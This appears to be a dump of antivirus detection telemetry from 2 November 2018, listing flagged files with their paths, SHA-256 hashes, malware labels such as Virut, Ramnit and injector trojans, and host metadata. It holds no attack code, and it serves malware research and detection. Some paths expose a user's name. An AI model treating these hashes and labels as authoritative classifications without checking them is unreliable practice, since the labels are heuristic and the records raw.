  Row(detection=Row(filename='avscan-20181102-082954-ab610b30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082954-AB610B30', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174227-21c2e92a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2853152\\AVSCAN-20181102-173838-009AC5C4\\AVSCAN-20181102-174227-21C2E92A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='1db53c54ad20a118b65f358848fc7ff3e91db289032d210e7bff3d72f24c178a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:43:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avatars.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\Avatars\\Avatars.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3dcc0f2f4a6c71d24c105c22ea053e1482f419f5aa927888f358eb1c72c564c4', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T08:07:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073511-47975c87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec0e5d97\\AVSCAN-20181102-073440-4369C101\\AVSCAN-20181102-073511-47975C87', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:35:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T04:22:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2467da6c-6cfa-1857-5350-d1c1542a84fb.exe', filepath='E:\\{91a1c5a4-6548-6720-0667-31d501ce30a7}\\2467da6c-6cfa-1857-5350-d1c1542a84fb.exe', filesize=320000, name='HEUR/AGEN.1006178.#M1.#R1'), hash='39a52fcc238b7643586ab46800984d87649c0aa5101a845416943eeaf7a6bb4a', metadata=Row(cmdline='\\\\\\/c \\\\\\"{91a1c5a4-6548-6720-0667-31d501ce30a7}\\\\\\\\2467da6c-6cfa-1857-5350-d1c1542a84fb.exe \'AUG_2018_(C01).pdf\'\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-02T14:38:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gzssz.dll', filepath='D:\\MariaDB\\lib\\plugin\\gzssz.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='27bcd2ea9456476b7ab0881ee7704d030721b09856caa463554d383754cd40e6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T22:29:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='temprec.exe', filepath='C:\\Users\\X\\Recorded TV\\TempRec\\TempRec.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:46:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154605-51022abc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154605-51022ABC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:49:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052859-2bbab011', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052859-2BBAB011', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051554-57a77fa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051554-57A77FA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102005-f1deee05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_87b29816\\AVSCAN-20181102-101949-EF18463D\\AVSCAN-20181102-102005-F1DEEE05', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133347-8e2e144a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133347-8E2E144A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:36:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meatholes.12.05.17.quincy.may.xxx.mp4-yapg.rar', filepath='G:\\MeatHoles.12.05.17.Quincy.May.XXX.MP4-YAPG-2\\.tmp\\MeatHoles.12.05.17.Quincy.May.XXX.MP4-YAPG.rar', filesize=9984000, name='TR/Agent.htex.#M1.#R1'), hash='4a852ea36c0af704071cdbc0bc520e0e19a58f6dd14800276c05fbeace1ab2b5', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T00:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f8d6e947f03ea8ef585be006ce13e5b264d3017069f8f999e0c6eac0adedfd1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\6F8D6E947F03EA8EF585BE006CE13E5B264D3017069F8F999E0C6EAC0ADEDFD1', filesize=64000, name='W97M/Thus.qeogk.#M1.#R1'), hash='6f8d6e947f03ea8ef585be006ce13e5b264d3017069f8f999e0c6eac0adedfd1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:03:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mpegav.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MOVIES\\MPEGAV\\MPEGAV.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='73c18cbaed5b72e91c293bb70286ab85930974b6506bb75dd1c85b9728e9d665', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T075419-02789/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061428-8621318a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061428-8621318A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053118-7ed0202d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053118-7ED0202D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113350-1720ec89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91bd8850\\AVSCAN-20181102-113236-0BCE7E9D\\AVSCAN-20181102-113350-1720EC89', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:37:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061954-487302ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061954-487302ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='shsukkms.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\SHSUkkmS.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055617-fc31b46b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055617-FC31B46B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061245-48c9cb61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061245-48C9CB61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061958-4af5f11e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061958-4AF5F11E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052235-46c18d62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052235-46C18D62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.140\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.140\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:23:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152530-6b9705b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152530-6B9705B7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062632-3611329c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062632-3611329C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062658-458ceb4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062658-458CEB4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052126-1d91ee44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052126-1D91EE44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055325-95755cad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055325-95755CAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052944-46aa48bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052944-46AA48BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060040-989f8876', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060040-989F8876', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062526-0eac81fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062526-0EAC81FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052458-9c591d06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052458-9C591D06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060244-e2f67496', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060244-E2F67496', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055310-8ca06e96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055310-8CA06E96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053529-1443bab0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053529-1443BAB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052126-1dc7fab8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052126-1DC7FAB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061122-17569fe5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061122-17569FE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054009-bafa986a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054009-BAFA986A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:08Z'), dt=datetime.date(2018, 11, 2)),
